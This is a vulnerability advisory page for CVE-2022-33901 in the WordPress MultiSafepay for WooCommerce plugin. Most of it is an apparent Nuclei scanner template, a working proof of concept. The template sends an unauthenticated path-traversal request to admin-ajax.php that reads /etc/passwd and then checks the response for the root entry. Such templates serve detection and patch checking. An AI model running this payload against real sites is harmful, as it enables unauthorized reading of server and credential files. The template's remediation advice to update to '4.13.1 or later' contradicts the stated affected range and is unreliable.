CVE-2022-33901: WordPress MultiSafepay for WooCommerce <=4.13.1 - Arbitrary File Read

日期: 2025-08-01 | 影响软件: WordPress MultiSafepay for WooCommerce | POC: 已公开

漏洞描述

WordPress MultiSafepay for WooCommerce plugin through 4.13.1 contains an arbitrary file read vulnerability. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

PoC代码[已公开]

id: CVE-2022-33901

info:
  name: WordPress MultiSafepay for WooCommerce <=4.13.1 - Arbitrary File Read
  author: theamanrawat
  severity: high
  description: |
    WordPress MultiSafepay for WooCommerce plugin through 4.13.1 contains an arbitrary file read vulnerability. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    An attacker can access sensitive information stored in arbitrary files on the server, potentially leading to further compromise of the system.
  remediation: |
    Update WordPress MultiSafepay for WooCommerce plugin to version 4.13.1 or later.
  reference:
    - https://wordpress.org/plugins/multisafepay/
    - https://wordpress.org/plugins/multisafepay/#developers
    - https://patchstack.com/database/vulnerability/multisafepay/wordpress-multisafepay-plugin-for-woocommerce-plugin-4-13-1-unauthenticated-arbitrary-file-read-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2022-33901
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-33901
    epss-score: 0.1031
    epss-percentile: 0.92905
    cpe: cpe:2.3:a:multisafepay:multisafepay_plugin_for_woocommerce:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: multisafepay
    product: multisafepay_plugin_for_woocommerce
    framework: wordpress
  tags: cve2022,cve,wp-plugin,wp,wordpress,unauth,multisafepay,woocommerce

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "application/octet-stream"

      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022040671162ac74a69a14fcf71bf3382382352fcf750477201b9169bcfeee9e0dfc0221009e1c269bace1fae3e2a55c470f43ae5059425ad569064532ad73f8c760fd7c19:922c64590222798bb761d5b6d8e72950